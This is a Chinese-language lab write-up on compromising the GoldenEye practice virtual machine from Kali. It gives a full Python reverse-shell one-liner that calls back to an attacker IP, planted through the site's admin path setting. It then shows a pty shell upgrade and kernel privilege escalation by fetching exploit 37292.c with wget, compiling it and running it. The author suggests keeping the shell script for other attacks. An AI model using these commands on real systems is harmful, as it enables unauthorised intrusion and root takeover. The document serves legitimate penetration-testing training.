测试环境
靶机:GoldenEye虚拟机(黄金眼)
攻击机:kali-linux 2020.1
组网方式:主机模式,靶机和攻击机均使用:主机模式模模式.
提权
由于我们已经使用了管理员admin用户登录页面,可以进行网站管理,在页面中找到了Site administration-Server-System paths。网站管理系统路径,发现可以上传代码。那么,我们可以在上面那个路径下添加反弹shell代码。
脚本内容如下(connect的地址要换成你的“战斗机”IP)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.8.129",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
上面这个python脚本是一个通用脚本,有兴趣的可以留存用于其他渗透攻击。脚本填好了,怎么触发它呢?别急,既然是靶机,既然我们相信自己的判断是正确的,那就一根筋的前进。有时候搞渗透的又需要一根筋,跟上篇讲的有些矛盾吗?呵呵。我们继续。照下图指示操作吧。
看到图右了么,我们已经以www-data用户渗入靶机了。前言说过,提权是渗透的最后一步,也是最关键的一步。失败了就是前功尽弃,成功了那就可以得瑟了。
先别急,虽然我们拿到普通用户权限,但是在提权之前,我们是不是需要一个稳定的tty呢?下面这个脚本也是一个通用脚本,使用ptyhon获得稳定的tty。脚本如下:python -c ‘import pty; pty.spawn("/bin/bash")’,这个是放之四海皆可使用的定式脚本。
接下来进入到最后一步:利用内核提权。
内核提权,顾名思义,内核有漏洞可被利用呗。
找到漏洞了,接下来就是怎么利用了。37292.c,之前的文章提过怎么利用系统漏洞进行提权。涉及到编程基础,没有基础的可以自己补一补。
靶机未安装gcc编译,只能用cc编译,需要修改37292.c编译。
剩下的就是把这个源文件上传到靶机,并用靶机的编译器编译成可执行的文件。传文件的工具很多,但是靶机是不完全系统,而且你也无法安装任何工具(在你控制它之前),怎么办?在战斗机上搭建一个简单的http服务器嘛。开启Apache2服务,将修改好的文件用wget下载到靶机上。
kali:
service apache2 start
靶机:
1、wget http://192.168.8.128/37292.c
2、cc -o exp 37292.c
3、chmod +x exp .
4、./exp
5、看效果
